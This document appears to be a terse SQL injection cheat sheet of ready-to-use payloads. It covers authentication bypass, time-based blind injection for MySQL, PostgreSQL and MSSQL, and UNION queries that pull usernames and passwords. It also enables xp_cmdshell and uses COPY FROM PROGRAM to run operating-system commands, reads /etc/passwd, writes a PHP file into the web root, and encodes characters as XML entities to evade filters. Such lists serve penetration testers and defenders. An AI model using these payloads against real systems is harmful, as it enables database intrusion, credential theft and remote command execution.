SQLi
Basics
1 OR 1=1-- -
1' OR 1=1-- -
admin'-- -
Time Based
# MySQL
1' AND (select SLEEP(5))-- -
# PostgreSQL
1';SELECT PG_SLEEP(5)-- -
1' AND 1=(select 1 from PG_SLEEP(5))-- -
1';CREATE TABLE hack(a text);copy hack from program 'sleep 10';DROP TABLE IF EXISTS hack;-- -
# MSSQL
1' WAITFOR DELAY '0:0:10'-- -
1';WAITFOR DELAY '0:0:10'-- -
1'; EXEC sp_configure 'show advanced options', 1 ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'ping 192.0.2.1 -n 1 -w 10000' -- -
1'; EXEC sp_configure 'show advanced options', 1 ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'powershell -c "Start-Sleep -Seconds 10"' -- -
Read/Write
# MySQL
select load_file('/etc/passwd');
select '<?php echo 1;?>' into OUTFILE '/var/www/html/test.php'
Union
1' Union Select 'aaa','bbb','ccc','ddd','eee' -- -
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 'abc',NULL,NULL--
' UNION SELECT username, password FROM users--
' UNION SELECT NULL,username||'~'||password FROM users--
# MySQL
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
XML Encoding
You can convert chars to xml references such as numerical or hexadecimal values
# Hex
echo -n 's' | xxd -plain | sed 's/\(..\)/\&#x\1;/g'
echo -n 's' | python3 -c 'import sys;[print(f"&#x{ord(char):x};",end="") for char in sys.stdin.read()]'
# Dec
echo -n 's' | python3 -c 'import sys;[print(f"&#{ord(char)};",end="") for char in sys.stdin.read()]'
# Example: s == s == s
Payload example
1 union select NULL